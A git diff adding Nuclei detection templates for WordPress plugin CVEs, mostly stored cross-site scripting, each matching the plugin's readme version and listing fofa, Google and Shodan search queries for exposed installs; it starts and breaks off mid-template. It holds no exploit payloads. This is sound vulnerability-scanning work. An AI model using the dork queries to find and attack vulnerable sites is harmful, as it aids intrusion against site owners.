https://www.wordfence.com/threat-intel/vulnerabilities/id/84adbde0-9a9b-4a76-9333-56880fcc139d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11754 + metadata: + fofa-query: "wp-content/plugins/booking-system-trafft/" + google-query: inurl:"/wp-content/plugins/booking-system-trafft/" + shodan-query: 'vuln:CVE-2024-11754' + tags: cve,wordpress,wp-plugin,booking-system-trafft,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/booking-system-trafft/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "booking-system-trafft" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11755-935ec9fc2ee3b23b1ccc21acca8e8636.yaml b/poc/cve/CVE-2024-11755-935ec9fc2ee3b23b1ccc21acca8e8636.yaml new file mode 100644 index 0000000000..f3a9c1615b --- /dev/null +++ b/poc/cve/CVE-2024-11755-935ec9fc2ee3b23b1ccc21acca8e8636.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11755-935ec9fc2ee3b23b1ccc21acca8e8636 + +info: + name: > + IMS Countdown <= 1.3.4 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The IMS Countdown plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Countdown post settings in all versions up to, and including, 1.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2de22728-4f67-406c-9db5-33cbba4c15eb?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11755 + metadata: + fofa-query: "wp-content/plugins/ims-countdown/" + google-query: inurl:"/wp-content/plugins/ims-countdown/" + shodan-query: 'vuln:CVE-2024-11755' + tags: cve,wordpress,wp-plugin,ims-countdown,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ims-countdown/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ims-countdown" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11759-d6a0a8830fda868046b3c5319b1e8383.yaml b/poc/cve/CVE-2024-11759-d6a0a8830fda868046b3c5319b1e8383.yaml new file mode 100644 index 0000000000..f7efdc86aa --- /dev/null +++ b/poc/cve/CVE-2024-11759-d6a0a8830fda868046b3c5319b1e8383.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11759-d6a0a8830fda868046b3c5319b1e8383 + +info: + name: > + Bukza <= 2.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Bukza plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'bukza' shortcode in all versions up to, and including, 2.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3e348b24-4c49-43ed-b4f3-b31f0f709830?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11759 + metadata: + fofa-query: "wp-content/plugins/bukza/" + google-query: inurl:"/wp-content/plugins/bukza/" + shodan-query: 'vuln:CVE-2024-11759' + tags: cve,wordpress,wp-plugin,bukza,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bukza/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bukza" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11763-abc5d805ccc6f324bc8947787eeff644.yaml b/poc/cve/CVE-2024-11763-abc5d805ccc6f324bc8947787eeff644.yaml new file mode 100644 index 0000000000..3e51daba8f --- /dev/null +++ b/poc/cve/CVE-2024-11763-abc5d805ccc6f324bc8947787eeff644.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11763-abc5d805ccc6f324bc8947787eeff644 + +info: + name: > + Plezi <= 1.0.6 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Plezi plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'plezi' shortcode in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/67768957-45be-48d9-ad5e-147290ef4cd5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11763 + metadata: + fofa-query: "wp-content/plugins/plezi/" + google-query: inurl:"/wp-content/plugins/plezi/" + shodan-query: 'vuln:CVE-2024-11763' + tags: cve,wordpress,wp-plugin,plezi,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/plezi/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "plezi" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11767.yaml b/poc/cve/CVE-2024-11767.yaml new file mode 100644 index 0000000000..9df61cfc67 --- /dev/null +++ b/poc/cve/CVE-2024-11767.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11767-91a6d26ebb5178e02ef1e638799045fa + +info: + name: > + NewsmanApp <= 2.7.6 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The NewsmanApp plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'newsman_subscribe_widget' shortcode in all versions up to, and including, 2.7.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/22a02e75-4ab1-48fb-b618-b1dff2fcd97f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11767 + metadata: + fofa-query: "wp-content/plugins/newsmanapp/" + google-query: inurl:"/wp-content/plugins/newsmanapp/" + shodan-query: 'vuln:CVE-2024-11767' + tags: cve,wordpress,wp-plugin,newsmanapp,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/newsmanapp/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "newsmanapp" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.7.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11770-8a21d7ed25582479ddfaa17a6cbfc663.yaml b/poc/cve/CVE-2024-11770-8a21d7ed25582479ddfaa17a6cbfc663.yaml new file mode 100644 index 0000000000..e08a410296 --- /dev/null +++ b/poc/cve/CVE-2024-11770-8a21d7ed25582479ddfaa17a6cbfc663.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11770-8a21d7ed25582479ddfaa17a6cbfc663 + +info: + name: > + Post Carousel & Slider <= 1.0.4 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Post Carousel & Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'post-cs' shortcode in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4cc038af-c4c8-4141-bbe3-81bcf0a2bace?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11770 + metadata: + fofa-query: "wp-content/plugins/post-types-carousel-slider/" + google-query: inurl:"/wp-content/plugins/post-types-carousel-slider/" + shodan-query: 'vuln:CVE-2024-11770' + tags: cve,wordpress,wp-plugin,post-types-carousel-slider,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/post-types-carousel-slider/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "post-types-carousel-slider" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11809.yaml b/poc/cve/CVE-2024-11809.yaml new file mode 100644 index 0000000000..40bd90c946 --- /dev/null +++ b/poc/cve/CVE-2024-11809.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11809-f088a4ea2afc64dbeeb9c239f0dd835c + +info: + name: > + Primer MyData for Woocommerce <= 4.2.1 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Primer MyData for Woocommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'img_src' parameter in all versions up to, and including, 4.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/aca092cf-9482-468e-8dd4-af04e25bcf33?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11809 + metadata: + fofa-query: "wp-content/plugins/primer-mydata/" + google-query: inurl:"/wp-content/plugins/primer-mydata/" + shodan-query: 'vuln:CVE-2024-11809' + tags: cve,wordpress,wp-plugin,primer-mydata,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/primer-mydata/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "primer-mydata" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.2.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11827.yaml b/poc/cve/CVE-2024-11827.yaml new file mode 100644 index 0000000000..c37330b51e --- /dev/null +++ b/poc/cve/CVE-2024-11827.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11827-1cfd9f40aa296523889f437bba603561 + +info: + name: > + Out of the Block: OpenStreetMap <= 2.8.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via ootb_query Shortcode + author: topscoder + severity: low + description: > + The Out of the Block: OpenStreetMap plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ootb_query shortcode in all versions up to, and including, 2.8.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c67c958e-1ab2-498c-b665-73e239d0029b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11827 + metadata: + fofa-query: "wp-content/plugins/ootb-openstreetmap/" + google-query: inurl:"/wp-content/plugins/ootb-openstreetmap/" + shodan-query: 'vuln:CVE-2024-11827' + tags: cve,wordpress,wp-plugin,ootb-openstreetmap,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ootb-openstreetmap/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ootb-openstreetmap" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11832.yaml b/poc/cve/CVE-2024-11832.yaml new file mode 100644 index 0000000000..dcbb4630ba --- /dev/null +++ b/poc/cve/CVE-2024-11832.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11832-ce764e7c1b8ba11b8ae5c2880094a1b5 + +info: + name: > + Beaver Builder – WordPress Page Builder <= 2.8.4.4 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom JavaScript row settings in all versions up to, and including, 2.8.4.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1988ff5e-2d3f-4901-8bcc-eb0a7da7566c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11832 + metadata: + fofa-query: "wp-content/plugins/beaver-builder-lite-version/" + google-query: inurl:"/wp-content/plugins/beaver-builder-lite-version/" + shodan-query: 'vuln:CVE-2024-11832' + tags: cve,wordpress,wp-plugin,beaver-builder-lite-version,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/beaver-builder-lite-version/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "beaver-builder-lite-version" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.4.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11841.yaml b/poc/cve/CVE-2024-11841.yaml new file mode 100644 index 0000000000..3701a028c4 --- /dev/null +++ b/poc/cve/CVE-2024-11841.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11841-f3a00a85c2a669580537ad1d561981fa + +info: + name: > + Tithe.ly Giving Button <= 1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Tithe.ly Giving Button plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/569f2250-971a-4000-9114-67e609ec907d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11841 + metadata: + fofa-query: "wp-content/plugins/wp-tithely/" + google-query: inurl:"/wp-content/plugins/wp-tithely/" + shodan-query: 'vuln:CVE-2024-11841' + tags: cve,wordpress,wp-plugin,wp-tithely,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-tithely/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-tithely" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11855-c68a0514b5572dba40197a1e12cc708d.yaml b/poc/cve/CVE-2024-11855-c68a0514b5572dba40197a1e12cc708d.yaml new file mode 100644 index 0000000000..74cd0f9c53 --- /dev/null +++ b/poc/cve/CVE-2024-11855-c68a0514b5572dba40197a1e12cc708d.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11855-c68a0514b5572dba40197a1e12cc708d + +info: + name: > + Koalendar – Events & Appointments Booking Calendar <= 1.0.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via height Parameter + author: topscoder + severity: low + description: > + The Koalendar – Events & Appointments Booking Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘height’ parameter in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cbbbf5fe-0369-4de6-9b2f-957286b6f394?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11855 + metadata: + fofa-query: "wp-content/plugins/koalendar-free-booking-widget/" + google-query: inurl:"/wp-content/plugins/koalendar-free-booking-widget/" + shodan-query: 'vuln:CVE-2024-11855' + tags: cve,wordpress,wp-plugin,koalendar-free-booking-widget,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/koalendar-free-booking-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "koalendar-free-booking-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11865-93d2fdcff3de5132748a3e57487e9324.yaml b/poc/cve/CVE-2024-11865-93d2fdcff3de5132748a3e57487e9324.yaml new file mode 100644 index 0000000000..75cd3bd028 --- /dev/null +++ b/poc/cve/CVE-2024-11865-93d2fdcff3de5132748a3e57487e9324.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11865-93d2fdcff3de5132748a3e57487e9324 + +info: + name: > + Tabs Maker <= 1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Tabs Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on tab descriptions. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/284c5646-7728-45bd-9479-483c806ca804?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11865 + metadata: + fofa-query: "wp-content/plugins/tabs-maker/" + google-query: inurl:"/wp-content/plugins/tabs-maker/" + shodan-query: 'vuln:CVE-2024-11865' + tags: cve,wordpress,wp-plugin,tabs-maker,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/tabs-maker/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tabs-maker" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11867-3bf808c90c9dd0a57945a67a217dbe53.yaml b/poc/cve/CVE-2024-11867-3bf808c90c9dd0a57945a67a217dbe53.yaml new file mode 100644 index 0000000000..938460803e --- /dev/null +++ b/poc/cve/CVE-2024-11867-3bf808c90c9dd0a57945a67a217dbe53.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11867-3bf808c90c9dd0a57945a67a217dbe53 + +info: + name: > + Companion Portfolio – Responsive Portfolio Plugin <= 2.4.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Companion Portfolio – Responsive Portfolio Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'companion-portfolio' shortcode in all versions up to, and including, 2.4.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/21df75e6-1f3e-4a08-a620-92b44fb48899?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11867 + metadata: + fofa-query: "wp-content/plugins/companion-portfolio/" + google-query: inurl:"/wp-content/plugins/companion-portfolio/" + shodan-query: 'vuln:CVE-2024-11867' + tags: cve,wordpress,wp-plugin,companion-portfolio,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/companion-portfolio/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "companion-portfolio" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.4.0.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11869-50ed005605a356d0d3b23edb855715d9.yaml b/poc/cve/CVE-2024-11869-50ed005605a356d0d3b23edb855715d9.yaml new file mode 100644 index 0000000000..bbbe0e8e1e --- /dev/null +++ b/poc/cve/CVE-2024-11869-50ed005605a356d0d3b23edb855715d9.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11869-50ed005605a356d0d3b23edb855715d9 + +info: + name: > + Buk for WordPress <= 1.0.7 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Buk for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'buk' shortcode in all versions up to, and including, 1.0.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/dc1ebc34-d728-42b4-92b4-9e1a4ebd88b2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11869 + metadata: + fofa-query: "wp-content/plugins/buk-appointments/" + google-query: inurl:"/wp-content/plugins/buk-appointments/" + shodan-query: 'vuln:CVE-2024-11869' + tags: cve,wordpress,wp-plugin,buk-appointments,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/buk-appointments/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "buk-appointments" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11873-f2f885a30706e264c4c12ffd5cfc514f.yaml b/poc/cve/CVE-2024-11873-f2f885a30706e264c4c12ffd5cfc514f.yaml new file mode 100644 index 0000000000..62cb7587e5 --- /dev/null +++ b/poc/cve/CVE-2024-11873-f2f885a30706e264c4c12ffd5cfc514f.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11873-f2f885a30706e264c4c12ffd5cfc514f + +info: + name: > + glomex oEmbed <= 0.9.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The glomex oEmbed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'glomex_integration' shortcode in all versions up to, and including, 0.9.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0e57cf85-eec0-4cf6-a800-ceb2b46e2bcd?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11873 + metadata: + fofa-query: "wp-content/plugins/glomex-oembed/" + google-query: inurl:"/wp-content/plugins/glomex-oembed/" + shodan-query: 'vuln:CVE-2024-11873' + tags: cve,wordpress,wp-plugin,glomex-oembed,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/glomex-oembed/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "glomex-oembed" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.9.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11876-9cd3f7953a8fa340c5fdf6ebfeb9bc83.yaml b/poc/cve/CVE-2024-11876-9cd3f7953a8fa340c5fdf6ebfeb9bc83.yaml new file mode 100644 index 0000000000..cf0473032b --- /dev/null +++ b/poc/cve/CVE-2024-11876-9cd3f7953a8fa340c5fdf6ebfeb9bc83.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11876-9cd3f7953a8fa340c5fdf6ebfeb9bc83 + +info: + name: > + Kredeum NFTs, the easiest way to sell your NFTs directly on your WordPress site <= 1.6.9 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Kredeum NFTs, the easiest way to sell your NFTs directly on your WordPress site plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'kredeum_opensky' shortcode in all versions up to, and including, 1.6.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3eb74ac2-ac5d-477b-8142-3e42953f859b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11876 + metadata: + fofa-query: "wp-content/plugins/kredeum-nfts/" + google-query: inurl:"/wp-content/plugins/kredeum-nfts/" + shodan-query: 'vuln:CVE-2024-11876' + tags: cve,wordpress,wp-plugin,kredeum-nfts,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/kredeum-nfts/readme.txt" + + extractors: + - 